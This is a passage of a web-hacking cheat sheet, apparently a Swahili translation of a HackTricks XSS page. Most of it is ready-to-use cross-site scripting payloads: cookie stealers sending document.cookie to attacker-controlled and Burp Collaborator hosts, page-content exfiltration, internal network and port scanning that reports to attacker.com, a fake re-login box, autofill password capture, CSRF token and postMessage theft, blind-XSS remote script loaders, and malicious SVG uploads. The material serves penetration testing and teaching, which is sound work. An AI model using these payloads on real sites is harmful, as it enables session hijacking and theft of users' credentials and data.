゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚o゚]
)(゚Θ゚)
)("_")
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
// It's also possible to execute JS code only with the chars: []`+!${}
```
## XSS common payloads
### Several payloads in 1
{{#ref}}
steal-info-js.md
{{#endref}}
### Iframe Trap
Fanya mtumiaji aendelee kwenye ukurasa bila kutoka kwenye iframe na kuiba vitendo vyake (ikiwemo taarifa zinazotumwa kwenye fomu):
{{#ref}}
../iframe-traps.md
{{#endref}}
### Retrieve Cookies
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
<div class="mdbook-alerts mdbook-alerts-note">
<p class="mdbook-alerts-title">
<span class="mdbook-alerts-icon"></span>
note
</p>
Hutaweza kupata vidakuzi kutoka JavaScript ikiwa bendera ya HTTPOnly imewekwa kwenye kidakuzi. Lakini hapa una [njia kadhaa za kupita ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa umebahatika.
</div>
### Pora Maudhui ya Ukurasa
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
```
### Pata IP za ndani
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}
function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})
setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>
```
### Port Scanner (fetch)
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
```
### Scanner ya Port (websockets)
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">python</span></div>
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}
```
_Maisha mafupi yanaonyesha bandari inayojibu_ _Maisha marefu yanaonyesha hakuna majibu._
Kagua orodha ya bandari zilizokatazwa katika Chrome [**hapa**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) na katika Firefox [**hapa**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
### Sanduku la kuomba ithibitisho
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
```
### Kukamata nywila za kujaza kiotomatiki
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
Wakati data yoyote inapoingizwa kwenye uwanja wa nywila, jina la mtumiaji na nywila vinatumwa kwa seva ya washambuliaji, hata kama mteja anachagua nywila iliyohifadhiwa na hajiandikishe chochote, taarifa za kuingia zitavuja.
### Keylogger
Nikiwa naangalia kwenye github, niliona tofauti kadhaa:
- [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
- [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
- [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
- Unaweza pia kutumia metasploit `http_javascript_keylogger`
### Kuiba token za CSRF
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
### Kuiba ujumbe wa PostMessage
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>
```
### Kutumia Wafanyakazi wa Huduma
{{#ref}}
abusing-service-workers.md
{{#endref}}
### Kufikia Shadow DOM
{{#ref}}
shadow-dom.md
{{#endref}}
### Polyglots
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
{{#endref}}
### Payloads za XSS za Kijinga
Unaweza pia kutumia: [https://xsshunter.com/](https://xsshunter.com)
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>
<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload== onerror=eval(atob(this.id))>
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload== autofocus>
<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
### Regex - Access Hidden Content
Kutoka [**hii andiko**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) inawezekana kujifunza kwamba hata kama baadhi ya thamani zinapotea kutoka JS, bado inawezekana kuziona katika sifa za JS katika vitu tofauti. Kwa mfano, ingizo la REGEX bado linaweza kupatikana baada ya thamani ya ingizo la regex kuondolewa:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)
// Remove flag value, nobody will be able to get it, right?
flag = ""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)
```
### Orodha ya Brute-Force
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
{{#endref}}
## XSS Kutumia udhaifu mwingine
### XSS katika Markdown
Unaweza kuingiza msimbo wa Markdown ambao utaonyeshwa? Labda unaweza kupata XSS! Angalia:
{{#ref}}
xss-in-markdown.md
{{#endref}}
### XSS kwa SSRF
Umepata XSS kwenye **tovuti inayotumia caching**? Jaribu **kuinua hiyo kuwa SSRF** kupitia Edge Side Include Injection kwa kutumia payload hii:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">python</span></div>
```python
<esi:include src="http://yoursite.com/capture" />
```
Tumia hii kupita vizuizi vya cookie, XSS filters na mengi zaidi!\
Taarifa zaidi kuhusu mbinu hii hapa: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).
### XSS katika PDF inayoundwa kwa dinamik
Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu **kudanganya bot** inayounda PDF ili **kutekeleza msimbo wa JS usio na mipaka**.\
Hivyo, ikiwa **bot ya kuunda PDF inapata** aina fulani ya **HTML** **tags**, itakuwa **inafasiri** hizo, na unaweza **kutumia** tabia hii kusababisha **Server XSS**.
{{#ref}}
server-side-xss-dynamic-pdf.md
{{#endref}}
Ikiwa huwezi kuingiza HTML tags inaweza kuwa na faida kujaribu **kuingiza data za PDF**:
{{#ref}}
pdf-injection.md
{{#endref}}
### XSS katika Amp4Email
AMP, inayolenga kuongeza utendaji wa ukurasa wa wavuti kwenye vifaa vya rununu, inajumuisha HTML tags zilizoimarishwa na JavaScript ili kuhakikisha kazi na kuzingatia kasi na usalama. Inasaidia anuwai ya vipengele kwa ajili ya vipengele mbalimbali, vinavyopatikana kupitia [AMP components](https://amp.dev/documentation/components/?format=websites).
Muundo wa [**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) unapanua vipengele maalum vya AMP kwa barua pepe, na kuwapa wapokeaji uwezo wa kuingiliana na maudhui moja kwa moja ndani ya barua zao pepe.
Mfano [**writeup XSS katika Amp4Email katika Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).
### XSS kupakia faili (svg)
Pakia kama picha faili kama ifuatavyo (kutoka [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">svg</span></div>
```svg
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div>
```xml
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' ><image href='1' onerror='alert(1)' /></svg>#x" />
```
Pata **payloads zaidi za SVG katika** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
## Njia Mbalimbali za JS & Taarifa Zinazohusiana
{{#ref}}
other-js-tricks.md
{{#endref}}
## Rasilimali za XSS
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
- [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
- [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list)
- [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
- [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
<div class="mdbook-alerts mdbook-alerts-tip">
<p class="mdbook-alerts-title">
<span class="mdbook-alerts-icon"></span>
tip
</p>
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
<details>
<summary>Support HackTricks</summary>
- Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
- **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
</div>